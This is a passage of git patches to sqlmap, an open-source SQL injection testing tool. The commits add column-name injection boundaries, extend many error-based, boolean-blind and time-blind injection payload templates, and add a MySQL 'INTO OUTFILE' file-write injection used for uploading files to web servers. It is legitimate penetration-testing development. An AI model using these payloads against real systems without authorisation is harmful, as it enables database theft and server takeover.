xml/payloads/error_based.xml +fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml +0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml -c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml +a3c7d92a688a452952dcbe53ce86cf30 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml a5eecbca03800851635817e0ca832a92 xml/queries.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index 8ecfe598006..52a6fd33beb 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -54,6 +54,7 @@ Tag: 3: LIKE single quoted string 4: Double quoted string 5: LIKE double quoted string + 6: Identifier (e.g. column name) Sub-tag: A string to prepend to the payload. @@ -491,20 +492,29 @@ Formats: 4 - 1 + 8 1 - 1 - ` - AND `[ORIGINAL] + 6 + `=`[ORIGINAL]` + AND `[ORIGINAL]`=`[ORIGINAL] 5 - 1 + 8 1 - 1 - "=[ORIGINAL] - AND [ORIGINAL]="[ORIGINAL] + 6 + "="[ORIGINAL]" + AND "[ORIGINAL]"="[ORIGINAL] + + + + 5 + 8 + 1 + 6 + ]=[[ORIGINAL]] + AND [[ORIGINAL]]=[[ORIGINAL] diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index ecf19cf8a19..00ba460f69b 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -160,7 +160,7 @@ Tag: 1 1 1 - 1,9 + 1,8,9 1 AND [INFERENCE] @@ -378,7 +378,7 @@ Tag: 1 3 1 - 1,2,3 + 1,2,3,8 1 AND MAKE_SET([INFERENCE],[RANDNUM]) @@ -416,7 +416,7 @@ Tag: 1 4 1 - 1,2,3 + 1,2,3,8 1 AND ELT([INFERENCE],[RANDNUM]) @@ -454,7 +454,7 @@ Tag: 1 5 1 - 1,2,3 + 1,2,3,8 1 AND ([INFERENCE])*[RANDNUM] @@ -492,7 +492,7 @@ Tag: 1 2 1 - 1 + 1,8 1 AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL diff --git a/xml/payloads/error_based.xml b/xml/payloads/error_based.xml index 5cd78d8c107..410cada6941 100644 --- a/xml/payloads/error_based.xml +++ b/xml/payloads/error_based.xml @@ -7,7 +7,7 @@ 2 4 1 - 1,2,3,9 + 1,2,3,8,9 1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) @@ -32,7 +32,7 @@ 2 4 3 - 1,9 + 1,8,9 1 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) @@ -56,7 +56,7 @@ 2 4 1 - 1,2,3,9 + 1,2,3,8,9 1 AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) @@ -76,7 +76,7 @@ 2 4 3 - 1,9 + 1,8,9 1 OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) @@ -96,7 +96,7 @@ 2 5 1 - 1,2,3,9 + 1,2,3,8,9 1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) @@ -117,7 +117,7 @@ 2 5 3 - 1,9 + 1,8,9 1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) @@ -137,7 +137,7 @@ 2 1 1 - 1,2,3,9 + 1,2,3,8,9 1 AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) @@ -161,7 +161,7 @@ 2 1 3 - 1,2,3,9 + 1,2,3,8,9 1 OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) @@ -186,7 +186,7 @@ 2 2 1 - 1,2,3,9 + 1,2,3,8,9 1 AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) @@ -210,7 +210,7 @@ 2 2 3 - 1,2,3,9 + 1,2,3,8,9 1 OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) @@ -235,7 +235,7 @@ 2 3 1 - 1,2,3,9 + 1,2,3,8,9 1 AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) @@ -259,7 +259,7 @@ 2 3 3 - 1,2,3,9 + 1,2,3,8,9 1 OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) @@ -284,7 +284,7 @@ 2 2 1 - 1,2,3,9 + 1,2,3,8,9 1 AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) @@ -309,7 +309,7 @@ 2 2 3 - 1,9 + 1,8,9 1 OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) @@ -334,7 +334,7 @@ 2 3 3 - 1,9 + 1,8,9 2 OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) @@ -354,7 +354,7 @@ 2 1 1 - 1,9 + 1,8,9 1 AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) @@ -373,7 +373,7 @@ 2 1 3 - 1,9 + 1,8,9 2 OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) @@ -392,7 +392,7 @@ 2 1 1 - 1,9 + 1,8,9 1 AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) @@ -413,7 +413,7 @@ 2 2 3 - 1,9 + 1,8,9 2 OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) @@ -434,7 +434,7 @@ 2 2 1 - 1,9 + 1,8,9 1 AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) @@ -455,7 +455,7 @@ 2 3 3 - 1,9 + 1,8,9 2 OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) @@ -476,7 +476,7 @@ 2 2 1 - 1,9 + 1,8,9 1 AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') @@ -497,7 +497,7 @@ 2 3 3 - 1,9 + 1,8,9 2 OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') diff --git a/xml/payloads/time_blind.xml b/xml/payloads/time_blind.xml index f92112a7cf8..d7453947008 100644 --- a/xml/payloads/time_blind.xml +++ b/xml/payloads/time_blind.xml @@ -7,7 +7,7 @@ 5 1 1 - 1,2,3,9 + 1,2,3,8,9 1 AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) @@ -89,7 +89,7 @@ 5 2 1 - 1,2,3,9 + 1,2,3,8,9 1 AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) @@ -171,7 +171,7 @@ 5 2 2 - 1,2,3,9 + 1,2,3,8,9 1 AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) @@ -335,7 +335,7 @@ 5 3 1 - 1,2,3,9 + 1,2,3,8,9 1 AND ELT([INFERENCE],SLEEP([SLEEPTIME])) @@ -414,7 +414,7 @@ 5 1 1 - 1,2,3,9 + 1,2,3,8,9 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -496,7 +496,7 @@ 5 2 2 - 1,2,3,9 + 1,2,3,8,9 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) @@ -617,7 +617,7 @@ 5 2 2 - 1,2,3,9 + 1,2,3,8,9 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) From 349e9b9fa5491c60b90860a6bfcca51343634799 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 6 Sep 2018 00:16:59 +0200 Subject: [PATCH 266/428] Minor commit related to the #120 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/payloads/time_blind.xml | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d3ce650b61c..ff1c03088fe 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.7" +VERSION = "1.2.9.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1ae853c3ba3..d5cbc953c33 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c97ad42bb26a96c31617bd6e89de0761 lib/core/settings.py +8e0191efaa0a5d6a64a8e4e0aa772164 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -476,6 +476,6 @@ fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml -a3c7d92a688a452952dcbe53ce86cf30 xml/payloads/time_blind.xml +92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml a5eecbca03800851635817e0ca832a92 xml/queries.xml diff --git a/xml/payloads/time_blind.xml b/xml/payloads/time_blind.xml index d7453947008..6423a8050ab 100644 --- a/xml/payloads/time_blind.xml +++ b/xml/payloads/time_blind.xml @@ -937,7 +937,7 @@ 5 3 2 - 1,9 + 1,8,9 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) From c37014b8e860aaa26a5888a30a3f2d894787b28e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 6 Sep 2018 00:59:29 +0200 Subject: [PATCH 267/428] Implementation for an Issue #647 --- lib/core/settings.py | 2 +- lib/takeover/web.py | 3 +-- plugins/dbms/mysql/filesystem.py | 32 ++++++++++++++++++++++++++++++++ plugins/generic/filesystem.py | 10 ++++++++-- procs/mysql/write_file_limit.sql | 2 +- txt/checksum.md5 | 8 ++++---- 6 files changed, 47 insertions(+), 10 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index ff1c03088fe..6ad23840554 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.8" +VERSION = "1.2.9.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 91e6bd9a458..67e0fdcb1ef 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -146,8 +146,7 @@ def _webFileInject(self, fileContent, fileName, directory): query += "OR %d=%d " % (randInt, randInt) query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery, conf.encoding)) - query = agent.prefixQuery(query) - query = agent.suffixQuery(query) + query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) payload = agent.payload(newValue=query) page = Request.queryPage(payload) diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index 1181d3a8664..15819ab67c1 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -5,6 +5,8 @@ See the file 'LICENSE' for copying permission """ +from lib.core.agent import agent +from lib.core.common import getSQLSnippet from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import popValue @@ -16,11 +18,13 @@ from lib.core.data import logger from lib.core.decorators import stackedmethod from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.exception import SqlmapNoneDataException from lib.request import inject +from lib.request.connect import Connect as Request from lib.techniques.union.use import unionUse from plugins.generic.filesystem import Filesystem as GenericFilesystem @@ -112,6 +116,34 @@ def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): return self.askCheckWrittenFile(wFile, dFile, forceCheck) + def linesTerminatedWriteFile(self, wFile, dFile, fileType, forceCheck=False): + logger.debug("encoding file to its hexadecimal string value") + + fcEncodedList = self.fileEncode(wFile, "hex", True) + fcEncodedStr = fcEncodedList[0][2:] + fcEncodedStrLen = len(fcEncodedStr) + + if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: + warnMsg = "the injection is on a GET parameter and the file " + warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen + warnMsg += "bytes, this might cause errors in the file " + warnMsg += "writing process" + logger.warn(warnMsg) + + debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) + logger.debug(debugMsg) + + query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=dFile, HEXSTRING=fcEncodedStr) + query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) + payload = agent.payload(newValue=query) + page = Request.queryPage(payload) + + warnMsg = "expect junk characters inside the " + warnMsg += "file as a leftover from original query" + singleTimeWarnMessage(warnMsg) + + return self.askCheckWrittenFile(wFile, dFile, forceCheck) + def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): debugMsg = "creating a support table to write the hexadecimal " debugMsg += "encoded file to" diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index 59ca3284ef3..8ae9ecfca78 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py @@ -284,17 +284,23 @@ def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): if conf.direct or isStackingAvailable(): if isStackingAvailable(): debugMsg = "going to upload the file '%s' with " % fileType - debugMsg += "stacked query SQL injection technique" + debugMsg += "stacked query technique" logger.debug(debugMsg) written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) self.cleanup(onlyFileTbl=True) elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): debugMsg = "going to upload the file '%s' with " % fileType - debugMsg += "UNION query SQL injection technique" + debugMsg += "UNION query technique" logger.debug(debugMsg) written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) + elif Backend.isDbms(DBMS.MYSQL): + debugMsg = "going to upload the file '%s' with " % fileType + debugMsg += "LINES TERMINATED BY technique" + logger.debug(debugMsg) + + written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck) else: errMsg = "none of the SQL injection techniques detected can " errMsg += "be used to write files to the underlying file " diff --git a/procs/mysql/write_file_limit.sql b/procs/mysql/write_file_limit.sql index 58fccab0a19..e879fbe4030 100644 --- a/procs/mysql/write_file_limit.sql +++ b/procs/mysql/write_file_limit.sql @@ -1 +1 @@ -LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- +LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- - diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d5cbc953c33..06a6c8ca575 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8e0191efaa0a5d6a64a8e4e0aa772164 lib/core/settings.py +c762da4ab30d1e245ca359df355ff7a7 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -89,7 +89,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 6a49f359b922df0247eb236126596336 lib/takeover/udf.py -f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py +a3d07df8a780c668a11f06be42014cdc lib/takeover/web.py debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py @@ -172,7 +172,7 @@ f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py 11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py -4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py +2f97535b5cfb28eac0d51bf67a0304f7 plugins/dbms/mysql/filesystem.py 34d951003dca386719c4d91384d2669a plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py @@ -210,7 +210,7 @@ ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py 78813e60e7108f78ef1af46d360f41bf plugins/generic/databases.py 4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py -0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py +0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py From 2b56bdfaa6fc7a3bca4a636500d7ea7c67ff5039 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 6 Sep 2018 13:59:07 +0200 Subject: [PATCH 268/428] Patch for MsSQL column name injection --- lib/core/settings.py | 3 ++- thirdparty/ansistrm/ansistrm.py | 14 ++++++++++++-- txt/checksum.md5 | 6 +++--- xml/boundaries.xml | 4 ++-- 4 files changed, 19 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6ad23840554..84e2fcf4941 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.9" +VERSION = "1.2.9.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -324,6 +324,7 @@ # Regular expressions used for parsing error messages (--parse-errors) ERROR_PARSING_REGEXES = ( + r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\](?P[^<]+)", r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", r"(?P[^\n>]*SQL Syntax[^\n<]+)", diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 9c2ae6dbd03..24533f249d2 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -182,8 +182,8 @@ def colorize(self, message, levelno): message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) if level != "PAYLOAD": - for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted - string = match.group(1) + if any(_ in message for _ in ("parsed DBMS error message",)): + string = re.search(r": '(.+)'", message).group(1) if not message.endswith(self.reset): reset = self.reset elif self.bold in message: # bold @@ -191,6 +191,16 @@ def colorize(self, message, levelno): else: reset = self.reset message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) + else: + for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted + string = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif self.bold in message: # bold + reset = self.reset + self.bold + else: + reset = self.reset + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) else: message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 06a6c8ca575..b91a5d368b5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c762da4ab30d1e245ca359df355ff7a7 lib/core/settings.py +021d606c9405fd23d630108bf5c39853 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -287,7 +287,7 @@ f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py de532c4e3160039335010c499129d54f tamper/xforwardedfor.py -1996d6afa985a526df02efa1bf121976 thirdparty/ansistrm/ansistrm.py +b422795c5e589decec725963e480ffba thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py @@ -469,7 +469,7 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -b306c99a038b03421beea655dc804b64 xml/boundaries.xml +de871ef9c982799a7f7f84621f103f26 xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index 52a6fd33beb..8f2351412bb 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -513,8 +513,8 @@ Formats: 8 1 6 - ]=[[ORIGINAL]] - AND [[ORIGINAL]]=[[ORIGINAL] + ]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM] + )|[[ORIGINAL] From 4c25a20efc458d8d1063ec0e5e8c8271dc515cbb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 7 Sep 2018 11:23:47 +0200 Subject: [PATCH 269/428] Docstring update and smalldict update (merge with top1575) --- lib/core/common.py | 56 ++++++++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 +- txt/smalldict.txt | 291 +++++++++++++++++++++++++++++++++++++++++++ 4 files changed, 348 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 5edc4f3ee3c..55379f7b203 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -165,6 +165,7 @@ from lib.core.settings import URLENCODE_CHAR_LIMIT from lib.core.settings import URLENCODE_FAILSAFE_CHARS from lib.core.settings import USER_AGENT_ALIASES +from lib.core.settings import VERSION from lib.core.settings import VERSION_STRING from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.threads import getCurrentThreadData @@ -1165,6 +1166,9 @@ def getHeader(headers, key): def checkFile(filename, raiseOnError=True): """ Checks for file existence and readability + + >>> checkFile(__file__) + True """ valid = True @@ -1647,6 +1651,9 @@ def parseUnionPage(page): def parseFilePaths(page): """ Detects (possible) absolute system paths inside the provided page content + + >>> _ = "/var/www/html/index.php"; parseFilePaths("Error occurred at line 207 of: %s
    Please contact your administrator" % _); _ in kb.absFilePaths + True """ if page: @@ -2039,6 +2046,9 @@ def parseXmlFile(xmlFile, handler): def getSQLSnippet(dbms, sfile, **variables): """ Returns content of SQL snippet located inside 'procs/' directory + + >>> 'RECONFIGURE' in getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") + True """ if sfile.endswith('.sql') and os.path.exists(sfile): @@ -2078,9 +2088,12 @@ def getSQLSnippet(dbms, sfile, **variables): return retVal -def readCachedFileContent(filename, mode='rb'): +def readCachedFileContent(filename, mode="rb"): """ Cached reading of file content (avoiding multiple same file reading) + + >>> "readCachedFileContent" in readCachedFileContent(__file__) + True """ if filename not in kb.cache.content: @@ -2137,6 +2150,9 @@ def average(values): def calculateDeltaSeconds(start): """ Returns elapsed time from start till now + + >>> calculateDeltaSeconds(0) > 1151721660 + True """ return time.time() - start @@ -2144,6 +2160,9 @@ def calculateDeltaSeconds(start): def initCommonOutputs(): """ Initializes dictionary containing common output values used by "good samaritan" feature + + >>> initCommonOutputs(); "information_schema" in kb.commonOutputs["Databases"] + True """ kb.commonOutputs = {} @@ -3351,6 +3370,9 @@ def unhandledExceptionMessage(): def getLatestRevision(): """ Retrieves latest revision from the offical repository + + >>> getLatestRevision() == VERSION + True """ retVal = None @@ -4149,6 +4171,9 @@ def checkSystemEncoding(): def evaluateCode(code, variables=None): """ Executes given python code given in a string form + + >>> _ = {}; evaluateCode("a = 1; b = 2; c = a", _); _["c"] + 1 """ try: @@ -4202,6 +4227,9 @@ def incrementCounter(technique): def getCounter(technique): """ Returns query counter for a given technique + + >>> resetCounter(PAYLOAD.TECHNIQUE.STACKED); incrementCounter(PAYLOAD.TECHNIQUE.STACKED); getCounter(PAYLOAD.TECHNIQUE.STACKED) + 1 """ return kb.counters.get(technique, 0) @@ -4441,6 +4469,9 @@ def zeroDepthSearch(expression, value): """ Searches occurrences of value inside expression at 0-depth level regarding the parentheses + + >>> _ = "SELECT (SELECT id FROM users WHERE 2>1) AS result FROM DUAL"; _[zeroDepthSearch(_, "FROM")[0]:] + 'FROM DUAL' """ retVal = [] @@ -4476,7 +4507,7 @@ def pollProcess(process, suppress_errors=False): Checks for process status (prints . if still running) """ - while True: + while process: dataToStdout(".") time.sleep(1) @@ -4701,12 +4732,33 @@ def getSafeExString(ex, 